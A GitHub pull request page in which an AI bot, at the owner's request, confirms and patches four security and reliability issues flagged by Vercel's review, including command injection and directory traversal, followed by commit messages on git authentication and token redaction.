Skip to content

build#110

Merged
julianbenegas merged 7 commits intomainfrom
jb/build-mode
Jan 19, 2026
Merged

build#110
julianbenegas merged 7 commits intomainfrom
jb/build-mode

Conversation

@julianbenegas
Copy link
Member

@julianbenegas julianbenegas commented Jan 19, 2026

No description provided.

@vercel
Copy link
Contributor

vercel bot commented Jan 19, 2026
edited
Loading

The latest updates on your projects. Learn more about Vercel for GitHub.

Project Deployment Review Updated (UTC)
forums Ready Ready Preview, Comment Jan 19, 2026 6:18am

vercel[bot]
vercel bot reviewed Jan 19, 2026
View reviewed changes
@julianbenegas
Copy link
Member Author

julianbenegas commented Jan 19, 2026

@claude verify vercel's feedback and if they're not false positives, apply 'em.

@claude
Copy link

claude bot commented Jan 19, 2026
edited
Loading

Claude finished @julianbenegas's task in 2m 36s —— View job

Vercel's Security Feedback Verified and Applied

  • Read affected files
  • Verify issue 1: Command injection in Bash tool ✓ LEGITIMATE
  • Verify issue 2: Directory traversal in normalizePath ✓ LEGITIMATE
  • Verify issue 3: Unhandled JSON.parse error ✓ LEGITIMATE
  • Verify issue 4: Exit code parsing bug ✓ LEGITIMATE
  • Apply fixes to build-tools.ts
  • Apply fixes to workspace.ts
  • Commit and push changes

Summary

All 4 issues reported by Vercel are legitimate and have been fixed:

  1. Command injection vulnerability (agent/tools/build-tools.ts:223-228)

    • Vulnerability allowing arbitrary code execution via template literal interpolation
    • Fixed by using bash positional parameters with proper escaping

  2. Directory traversal vulnerability (agent/tools/build-tools.ts:15-26)

    • Vulnerability allowing file access outside workspace via .. sequences
    • Fixed by using path.resolve() and validating resolved paths are within workspace

  3. Unhandled JSON.parse error (agent/workspace.ts:406, 555)

    • Missing error handling for malformed JSON causing unhandled exceptions
    • Fixed by wrapping in try-catch with detailed error logging

  4. Exit code parsing bug (agent/tools/build-tools.ts:242)

    • Bug causing incorrect exit codes when background processes output after marker
    • Fixed by removing end-of-string anchor from regex

Changes committed and pushed to jb/build-mode.

--- • Branch: jb/build-mode

@github-actions @julianbenegas
fix: apply security patches from Vercel review
67f2884 
- Fix command injection in Bash tool by using positional parameters
- Fix directory traversal in normalizePath by validating resolved paths
- Add error handling for JSON.parse in workspace initialization
- Fix exit code parsing to handle background process output

Co-authored-by: Julian Benegas <julianbenegas@users.noreply.github.com>
julianbenegas and others added 2 commits January 18, 2026 21:45
@julianbenegas
Merge branch 'main' into jb/build-mode
47d8fce
@julianbenegas @claude
fix: improve build mode agent git auth and security
dc0f1e3 
- Configure git credential helper to use GH_TOKEN at runtime instead of
  relying on gh auth setup-git (which doesn't work without token in env)
- Sanitize Bash tool stdout/stderr to redact leaked tokens
- Update system prompt: clarify git is pre-configured, push just works
- Use unique branch names with random suffix to avoid conflicts
- Move inline regex to top-level to fix biome warning

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
@julianbenegas @claude
fix: require userEmail/userName for build mode, use object params
16d0b5a 
- Pass userEmail/userName through streamTextStep to getWorkspace
- Make userEmail/userName required in initializeBuildWorkspace
- Remove silent fallback to "Forums Build Agent" defaults
- Throw error if user identity missing in build mode
- Convert initializeBuildWorkspace and initializeAskWorkspace to object params

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
vercel[bot]
vercel bot reviewed Jan 19, 2026
View reviewed changes
@github-actions @julianbenegas
fix: validate email/name early in build mode
4c567e4 
Co-authored-by: Julian Benegas <julianbenegas@users.noreply.github.com>
@julianbenegas julianbenegas merged commit 1b61ec7 into main Jan 19, 2026
1 check passed
@julianbenegas julianbenegas deleted the jb/build-mode branch January 19, 2026 06:17
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@vercel vercel[bot] vercel[bot] left review comments

@claude claude[bot] claude[bot] left review comments

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@julianbenegas